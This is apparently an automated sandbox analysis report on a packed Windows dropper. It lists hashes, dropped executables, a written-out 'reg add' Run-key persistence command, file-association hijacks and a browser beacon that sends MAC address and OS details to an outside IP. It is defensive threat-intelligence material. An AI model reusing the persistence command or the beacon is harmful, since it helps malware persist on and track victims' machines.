95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949

Analysis

max time kernel
172s
max time network
122s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
02-12-2022 23:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
Size

250KB
MD5

3cec113c886e7c5581b797f3698a33b4
SHA1

6cdba588e6a319285b44c69486bfb1a7ca411969
SHA256

95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949
SHA512

88ee5cf6e5558738e934a041ed239a1a868cd8cd8fcec0cce04a3099fcff4a3dff473b4555300da7096ce88dcc943223b9f1dee839775b8da92be36c0231a351
SSDEEP

6144:hu2urzh9xu/XkauEvJK8xja9zT8nquk6XfotMq3RV:hutrzh9xOXk/LraAtX

Score

8^/10

persistence upx

Malware Config

Signatures

Executes dropped EXE 3 IoCs

pid	Process
2012	t2.exe
1756	bho.exe
1768	test.exe

UPX packed file 11 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00070000000132e5-55.dat	upx
behavioral1/files/0x00070000000132e5-56.dat	upx
behavioral1/files/0x00070000000132e5-60.dat	upx
behavioral1/files/0x00070000000132f6-68.dat	upx
behavioral1/files/0x00070000000132f6-70.dat	upx
behavioral1/memory/2012-72-0x0000000000400000-0x0000000000421000-memory.dmp	upx
behavioral1/files/0x00070000000132f6-73.dat	upx
behavioral1/memory/1768-79-0x0000000000400000-0x0000000000A29000-memory.dmp	upx
behavioral1/memory/1768-82-0x0000000000400000-0x0000000000A29000-memory.dmp	upx
behavioral1/files/0x00070000000132e5-85.dat	upx
behavioral1/memory/2012-86-0x0000000000400000-0x0000000000421000-memory.dmp	upx

Loads dropped DLL 6 IoCs

pid	Process
1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\micrososot = "c:\\program files (x86)\\winsoft9\\t2.exe "	reg.exe

Drops file in Program Files directory 23 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\winsoft9\3.vbs	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\t2.exe	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\taobao.ico	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\taobao.ico	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\game.ico	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dll	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\1.vbs	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\WINDOWS	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\bho.exe	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\WINDOWS\time	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dll	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\t2.exe	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\test.exe	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\game.ico	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files\Thunder\thunder.exe	test.exe
File opened for modification	C:\Program Files (x86)\winsoft9	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dil	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\1.vbs	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\3.vbs	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\bho.exe	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\test.exe	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File created	C:\Program Files (x86)\winsoft9\__tmp_rar_sfx_access_check_7095596	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
File opened for modification	C:\Program Files (x86)\winsoft9\WINDOWS\time\mian.dil	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\WINDOWS\Downloaded Program Files\mm.ico	test.exe
File created	C:\Windows\Survival_0.txt	t2.exe
File created	C:\WINDOWS\Downloaded Program Files\taobao.ico	test.exe
File opened for modification	C:\WINDOWS\Downloaded Program Files\taobao.ico	test.exe
File created	C:\WINDOWS\Downloaded Program Files\game.ico	test.exe
File created	C:\WINDOWS\Downloaded Program Files\movie.ico	test.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 61 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376437886"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7B2C8490-74E4-11ED-AFAE-66397CAA4A34} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10646b4bf108d901	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c35c09eef61e5a4cb69553d55c365865000000000200000000001066000000010000200000001b701eca69f265801972fb5a99c37a0d94ed8116c2754adf86ba9975b000fe46000000000e8000000002000020000000f3f12275746f3a6e67eeee51efe45caeb4c41d19b0ba843bfb2dc8c24808cf7420000000a1e1d6d9ed2433387a42ccc03c33c653500160d73040ad0295ce7450158f84894000000009cc83af0910fd4f95e9c587f8e0a1ba36d8c0421c0536038fd4d50334ecacc96b891a0ff71470270cdfa0a5fbeab59fb73b835817661d5fb57220978902b6b3	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	test.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c35c09eef61e5a4cb69553d55c365865000000000200000000001066000000010000200000003c66ccbc080da7f1c1f02ab2687ae3bb09cf942be3e19f41d66fcebcf52a1679000000000e8000000002000020000000348900394981861a3dde88032bc7a03fc5f6621b2b97897264187bc70b2ea5c990000000a1105d767d0480a2fd6da01f266543c2acbfc4114dedfa71f775d77b0d4b100eea7fa67b29ada2a6c8e0bfdf870452efb11b8219ed3d7fff04e2abb3fbcb4017efd92fba3dcb742256b1e51a82c853f843312f99273425809a49082cfbd0081116c510c019d6372f9a2a4ad164033ba4b921303a2b03028ce4c26778d57495a4be34580da7e031df4033a815584b498d40000000bb99e3c487781cf417131458f35e01d056baf170605ecf62007a4101f4e0be9e83fa0bf19192a7adac26e39033df3bae6f51fdcbcb62f8123dbaade103470f04	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\Frist	test.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7AE77CB1-74E4-11ED-AFAE-66397CAA4A34} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBarLayout = 110000005c00000000000000340000001f0000006e00000001000000a0060000a00f000005000000220400002600000002000000a1060000a00f000004000000a10000000f02000003000000a10200003b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	test.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main	t2.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser\ITBar7Layout = 130000000000000000000000300000001400000016000000010000000007000080010000030000000103000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	test.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open	test.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open\command	test.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\ScriptEngine\ = "JScript.Encode"	test.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\ScriptEngine\ = "JScript.Encode"	test.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\fonfile	test.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\DefaultIcon\ = "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe"	test.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\ScriptEngine	test.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell	test.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\DefaultIcon\ = "C:\\WINDOWS\\Downloaded Program Files\\game.ico"	test.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\anifile\shell\open\command\ = "C:\\Program Files\\Thunder\\thunder.exe \"%1\" %*"	test.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\fonfile\ScriptEngine	test.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe
2012	t2.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
1092	iexplore.exe
1832	iexplore.exe
1092	iexplore.exe

Suspicious use of SetWindowsHookEx 17 IoCs

pid	Process
2012	t2.exe
2012	t2.exe
2012	t2.exe
1092	iexplore.exe
1092	iexplore.exe
1832	iexplore.exe
1832	iexplore.exe
1092	iexplore.exe
1092	iexplore.exe
628	IEXPLORE.EXE
628	IEXPLORE.EXE
1560	IEXPLORE.EXE
1560	IEXPLORE.EXE
1560	IEXPLORE.EXE
1560	IEXPLORE.EXE
1560	IEXPLORE.EXE
1560	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 53 IoCs

description	pid	Process	procid_target
PID 1996 wrote to memory of 2012	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	28
PID 1996 wrote to memory of 2012	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	28
PID 1996 wrote to memory of 2012	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	28
PID 1996 wrote to memory of 2012	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	28
PID 1996 wrote to memory of 2012	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	28
PID 1996 wrote to memory of 2012	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	28
PID 1996 wrote to memory of 2012	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	28
PID 1996 wrote to memory of 1756	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	29
PID 1996 wrote to memory of 1756	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	29
PID 1996 wrote to memory of 1756	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	29
PID 1996 wrote to memory of 1756	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	29
PID 1996 wrote to memory of 1756	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	29
PID 1996 wrote to memory of 1756	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	29
PID 1996 wrote to memory of 1756	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	29
PID 1996 wrote to memory of 1768	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	30
PID 1996 wrote to memory of 1768	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	30
PID 1996 wrote to memory of 1768	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	30
PID 1996 wrote to memory of 1768	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	30
PID 1996 wrote to memory of 1768	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	30
PID 1996 wrote to memory of 1768	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	30
PID 1996 wrote to memory of 1768	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	30
PID 1996 wrote to memory of 1508	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	31
PID 1996 wrote to memory of 1508	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	31
PID 1996 wrote to memory of 1508	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	31
PID 1996 wrote to memory of 1508	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	31
PID 1996 wrote to memory of 1508	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	31
PID 1996 wrote to memory of 1508	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	31
PID 1996 wrote to memory of 1508	1996	95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe	31
PID 1768 wrote to memory of 1092	1768	test.exe	36
PID 1768 wrote to memory of 1092	1768	test.exe	36
PID 1768 wrote to memory of 1092	1768	test.exe	36
PID 1768 wrote to memory of 1092	1768	test.exe	36
PID 1092 wrote to memory of 1560	1092	iexplore.exe	38
PID 1092 wrote to memory of 1560	1092	iexplore.exe	38
PID 1092 wrote to memory of 1560	1092	iexplore.exe	38
PID 1092 wrote to memory of 1560	1092	iexplore.exe	38
PID 1092 wrote to memory of 1560	1092	iexplore.exe	38
PID 1092 wrote to memory of 1560	1092	iexplore.exe	38
PID 1092 wrote to memory of 1560	1092	iexplore.exe	38
PID 1832 wrote to memory of 628	1832	iexplore.exe	37
PID 1832 wrote to memory of 628	1832	iexplore.exe	37
PID 1832 wrote to memory of 628	1832	iexplore.exe	37
PID 1832 wrote to memory of 628	1832	iexplore.exe	37
PID 1832 wrote to memory of 628	1832	iexplore.exe	37
PID 1832 wrote to memory of 628	1832	iexplore.exe	37
PID 1832 wrote to memory of 628	1832	iexplore.exe	37
PID 2012 wrote to memory of 536	2012	t2.exe	40
PID 2012 wrote to memory of 536	2012	t2.exe	40
PID 2012 wrote to memory of 536	2012	t2.exe	40
PID 2012 wrote to memory of 536	2012	t2.exe	40
PID 2012 wrote to memory of 536	2012	t2.exe	40
PID 2012 wrote to memory of 536	2012	t2.exe	40
PID 2012 wrote to memory of 536	2012	t2.exe	40

C:\Users\Admin\AppData\Local\Temp\95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe
"C:\Users\Admin\AppData\Local\Temp\95e2b4306c52212ae960c2617490d11c18669af0dca54b8c6dbe85de1ce92949.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1996
- C:\Program Files (x86)\winsoft9\t2.exe
  "C:\Program Files (x86)\winsoft9\t2.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2012
- - C:\Windows\SysWOW64\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v "micrososot" /d "c:\program files (x86)\winsoft9\t2.exe " /f
    3⤵
    - Adds Run key to start application
    PID:536
- C:\Program Files (x86)\winsoft9\bho.exe
  "C:\Program Files (x86)\winsoft9\bho.exe"
  2⤵
  - Executes dropped EXE
  PID:1756
- C:\Program Files (x86)\winsoft9\test.exe
  "C:\Program Files (x86)\winsoft9\test.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Windows\system32\..\..\Program Files\Internet Explorer\iexplore.exe" http://58.218.198.119:8080/count.asp?mac=66-39-7c-aa-4a-34&os=Microsoft Windows XP&flag=11c7ec3d8744103b94c317172c1c8bd3&user=test
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1092
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1092 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
